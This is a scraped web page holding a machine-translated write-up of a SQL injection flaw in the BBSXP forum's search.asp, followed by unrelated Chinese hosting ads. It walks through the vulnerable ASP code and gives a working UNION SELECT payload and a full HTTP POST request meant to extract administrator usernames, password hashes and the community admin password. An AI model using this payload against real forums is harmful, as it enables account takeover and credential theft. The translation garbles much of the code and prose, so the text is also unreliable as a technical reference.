注入bbsxp注入漏洞(BBSXP injection vulnerability)

bbsxp  时间:2021-02-07  阅读:()

bbsxp注入漏洞BBSXP injection vulnerability

BBSXP injection vulnerability

BBSXP injection vulnerability

The newBBSXP injection vulnerability reappearance, can get theadministrator account password directly

-- I found a summary of the bbsxp5 sp1 vulnerability

There was an article about BBSXP in the early days of themagazine. It was a Cookie injection attack. The author wasingenious and could think of a logical loophole.

After reading the article, the school did not read the code.Having nothing to do during the summer vacation, I downloadedthe latest version of BBSXP and read it.

BBSXP is really small and small, and the file is short and short,but it' s a bit different from a DVBBS, whether it' s a functionor an interface.

But it' s a little bit of a flaw, after three years of testing.One. Search for loopholes

BBS to string input with HTMLEncode conversion, the numerictype with int function adjustment, Isnumeric functionjudgment.

Obviously there are Numbers and strings in the query that must

not be used as input values. You can't input as a value, whydo you enter it?

That' s the crux of the matter. I scanned each file with thisidea, and it took a long time to get to search. Asp

(seem to have had a loophole before, changed the original buthave a new) found a loophole, look at the code together.<! - # include file = "setup. Asp" -- >

The < %top

If request.cookies (" username ") = empty then error (" < li >you haven' t < a href = login.asp > login ")

DetectPost

If the Request (" menu ") = "ok" then

Search = Request (" search ")

Forumid forumid = Request (" ")

TimeLimit = Request (" TimeLimit ")

The content = the HTMLEncode (Request (" content ") )

Searchxm= the HTMLEncode (Request (" searchxm "))

Searchxm2 = the HTMLEncode (Request (" searchxm2 ") )

Searchxm2 = replace (searchxm2, "@", "&")

If the content = empty then the content = Request. Cookies ("u sername ")

If isnumeric (" "&forumid&" ") then forumidor = "forumid ="& "forumid &" "and"

If the search = "author" then

The item = "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

If TimeLimit < > "" then TimeLimitList =" and lasttime > "&SqlNowString &" -"

SQL = "select top" &MaxSearch& "* from forum where deltopic< > 1 and" & forumidor & "" &" "&" "&" & "&" & "&" & "&" "&""

"& TimeLimitList &" order by lasttime Desc"

Rs. The Open SQL, Conn, 1

. . . . . .

Let' s take a closer look at SQL = "select top" &MaxSearch. . .This one, where MaxSearch is defined, the default value is 500,We're left with 3 out of the outside.

1. If isnumeric (" "& forumid&" ") then forumidor = "forumid=" & "forumid &" "and"

As long as the forumid input is empty, forumidor is empty.

2. If TimeLimit < > ", "then TimeLimitList =" and lasttime >"& SqlNowString &" & int "(TimeLimit) &" "

TimeLimit is an integer, input (enter a 1) , then TimeLimitListbecomes "and lasttime > now () -1",

Change to "and lasttime > getdate () -1" in MSSQL.

3. If the search = "author" then

The item= "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

As long as the search = "author",

If the content is arbitrary input (to lose a abcd) , then item= HTMLEncode (searchxm) = 'abcd' ,

As soon as we construct the input and pass the above statement,the SQL statement becomes:

Select top 500*from forum where deltopic < > 1 and [HTMLEncode(searchxm) ] = 'abcd'

And lasttime > now () - 1 order by lasttime Desc

There are no single quotes around the brackets enclosed inbrackets, and obviously it can be used.

Let' s look at the HTMLEncode function first

The function the HTMLEncode (fString)

FString = replace (fString, "; ", "& # 59;")

FString = server. The htmlencode (fString)

FString = replace (fString, "' ", "& # 39;")

FString = replace (fString, "-", "& # 45; & # 45;")

FString = replace (fString, "", " the & # 92; ")

FString = replace (fString, vbCrlf, "< br >")

The HTMLEncode = fString

End the function

The filter is filtered, and the filter is very tight. Theprogrammer is also very difficult, and the filter is more thanlikely to affect the use.

There are fewer safety problems. So how do we use this filter?Naturally, you have to guess,

It is a feasible method, and the structure of the table is alsoknown, and it is easy to guess. But I' ll do it in a simple way.Two. Exploit

It is also valid for both ACCESS and MSSQL with a familiar unionquery. I'mnot going to write it, just to show you the results.Select top 500 * from forum where deltopic < > 1 and

The forumid= 0 union all select top 1, 1, [user] . Username astopic, forum. Use

Rname, content, forum. Posttime forum. Postip, 1, 1, 1, 1, 1, 1, 1,[user] . Userpass as lastname,

Lasttime, polltopic clubconfig. Adminpassword as pollresult,1 the from

[user], forum, clubconfig where [user] . Membercode=5 or forum.Id = 0 or clubconfig.adminpassword

= 'abcd' and lasttime > now () - 1 order by lasttime DescThe color part is the value of the searchxm we want to enter,and each character HTMLEncode function in the middle is notf iltered.

And the implication of this statement is that the statement infront of the union is false, because the forumid cannot be 0,The union only queries a record that contains theadministrator' s user name and encryption password, as well asthe encrypted password for community management.

The friend who knows the SQL statement will see it.

The number 1 does not make sense, just to match the type of thefield, ensuring that the number of fields before and after theunion is consistent with the type.

Here you can construct your own queries, and I give you areference.

Construct the input statement and construct the submission.Think of the classic WSE, if anyone thinks that you can writeyour own submit strings for the HTTP protocol,

I should also advise him to save energy and brain power.

(figure 1)

[2]

The construction is submitted as follows:

POST/BBSXP/search. Asp? The menu = ok HTTP / 1. 1

Accept: image/GIF, image/x-xbitmap, image/jpeg, image/pjpeg,appl ication/x- shockwave - f lash, appl ication/VND. Ms-excel,Appl ication/VND. - ms powerpoint, application/msword, * / *Referer: http://localhost:8000/bbsxp/search.asp

The Accept - Language: useful - cn

The content-type: application/x - WWW - form - urlencodedThe Accept - Encoding: gzip, deflate

The user-agent: Mozilla / 4.

0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)

Host: localhost: 8000

The Content - Length: 481

Connection: Keep Alive

The cache-control: no - Cache

Cookie: eremite = 0; Userpass =

E80B5017098950FC58AAD83C8C14978E; The username=admin; Skins= 1; ASPSESSIONIDSSRQSDTB =

OGLJMADCECKAFKGCPCCHBKHO; On l inet i me=2 d8%2004%2 d 13+2004%3 a08%3 a33; Addmin = 0

The content = fsaf&search = author&searchxm 20 forumid = % %3 d0 +union+all + select + top 1%+ 1 +2 c1 5 buser%2 c %%5 d.

Username + + topic as %2 cforum. The username% 2 ccontent %2 cforum. Posttime %2 cforum. Postip%2 c1%2 c1%2 c1%2 c1%2C1%2 C1%2 C1%2 c%5 buser%5 d. The userpass +as + lastname%2 clasttime%2 cpolltopic%2 cclubconfig. Adminpassword+ as+ pollresult % 2 c1 + from + % 5 buser cforum% 2 c % 5 d % 2Clubconfig +where + 5 buser % % 5 d. The membercode % 3 d5 +or + forum.

Id % 3 d0 + or + clubconf ig. Adminpassword&searchxm 2 =topic&TimeLimit = & forumid = & submit 1 = % BF % % % AA % CABC

CB % % % CB D1 F7

I've written an HTML page for the searchxm part, which can be

特网云,美国独立物理服务器 Atom d525 4G 100M 40G防御 280元/月 香港站群 E3-1200V2 8G 10M 1500元/月

特网云为您提供高速、稳定、安全、弹性的云计算服务计算、存储、监控、安全,完善的云产品满足您的一切所需,深耕云计算领域10余年;我们拥有前沿的核心技术,始终致力于为政府机构、企业组织和个人开发者提供稳定、安全、可靠、高性价比的云计算产品与服务。公司名:珠海市特网科技有限公司官方网站:https://www.56dr.com特网云为您提供高速、稳定、安全、弹性的云计算服务 计算、存储、监控、安全,完善...

raksmart:全新cloud云服务器系列测评,告诉你raksmart新产品效果好不好

2021年6月底,raksmart开发出来的新产品“cloud-云服务器”正式上线对外售卖,当前只有美国硅谷机房(或许以后会有其他数据中心加入)可供选择。或许你会问raksmart云服务器怎么样啊、raksm云服务器好不好、网络速度快不好之类的废话(不实测的话),本着主机测评趟雷、大家受益的原则,先开一个给大家测评一下!官方网站:https://www.raksmart.com云服务器的说明:底层...

妮妮云(43元/月 ) 香港 8核8G 43元/月 美国 8核8G

妮妮云的来历妮妮云是 789 陈总 张总 三方共同投资建立的网站 本着“良心 便宜 稳定”的初衷 为小白用户避免被坑妮妮云的市场定位妮妮云主要代理市场稳定速度的云服务器产品,避免新手购买云服务器的时候众多商家不知道如何选择,妮妮云就帮你选择好了产品,无需承担购买风险,不用担心出现被跑路 被诈骗的情况。妮妮云的售后保证妮妮云退款 通过于合作商的友好协商,云服务器提供2天内全额退款,超过2天不退款 物...

bbsxp为你推荐
yy频道中心YY频道管理中心怎么登录?公章制作如何制作公章二叉树遍历二叉树三种遍历方式原则?1433端口怎么去看1433端口童之磊华硕的四核平板电脑,怎么样?qq空间打扮QQ空间怎么打扮如何打扮人人逛街人人逛街评论怎么不显示链接了?好像4月28日就不能显示了。是什么原因呢?免费免费建站我想建一个自己的免费网站,但不知道那里有..云挂机云软件挂机赚钱是骗子铁路客服中心铁路客户服务中心怎么订票
虚拟主机提供商 域名查询系统 抗投诉vps主机 二级域名申请 中文域名申请 域名备案只选云聚达 便宜服务器 空间打开慢 天猫双十一抢红包 国外在线代理 cpanel空间 web服务器架设 已备案删除域名 最好的免费空间 河南移动网 vip购优惠 hkt 实惠 服务器机柜 nic 更多